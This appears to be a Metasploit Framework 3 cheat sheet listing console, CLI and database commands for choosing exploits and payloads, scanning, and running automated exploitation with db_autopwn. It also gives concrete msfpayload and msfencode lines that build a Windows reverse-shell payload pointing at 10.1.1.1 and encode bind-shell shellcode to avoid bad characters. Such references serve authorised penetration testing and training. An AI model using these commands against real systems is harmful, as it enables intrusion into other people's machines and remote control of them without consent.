Metasploit Framework 3
svn update
Web Interface:
./msfweb
Console:
./msfconsole
help
show exploits
search <name>
use <exploit name>
show options
set <OPTION NAME> <option>
show payloads
set PAYLOAD <payload name>
show options
set <OPTION NAME> <option>
show targets
set TARGET <target number>
exploit
sessions -l
sessions -i <id>
<ctrl> z
<ctrl> c
jobs
jobs -K
Auxiliary scanners:
show auxiliary
use <auxiliary name>
set <OPTION NAME> <option>
run
scanner/discovery/sweep_udp
scanner/smb/version
scanner/mssql/mssql_ping
scanner/mssql/mssql_login
Payloads:
Attacker behind firewall: bind shell
Target behind firewall: reverse shell
Meterpreter
Automated:
db_import_nessus_nbe
db_import_nmap_xml
./start-db-autopwn
su - postgres
cd /pentest/exploit/framework3
./msfconsole
load db_postgres
db_create
db_nmap targetIP
db_hosts
db_services
db_autopwn
db_autopwn -t -p -e
Command Line Interface:
./msfcli | grep -i <name>
./msfcli <exploit or auxiliary> S
./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E
Payload generator:
./msfpayload <payload> <variable=value> <output type>
S summary and options of payload
C C language
P Perl
y Ruby
R Raw, allows payload to be piped into msfencode and other tools
J JavaScript
X executable (Windows only)
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C
Encode shellcode:
./msfencode <options> <variable=value>
Pipe the output of msfpayload into msfencode, specify the bad characters to avoid, and list the available encoders.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -l
Choose the PexFnstenvMor encoder and format the output as C.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -e PexFnstenvMor -t c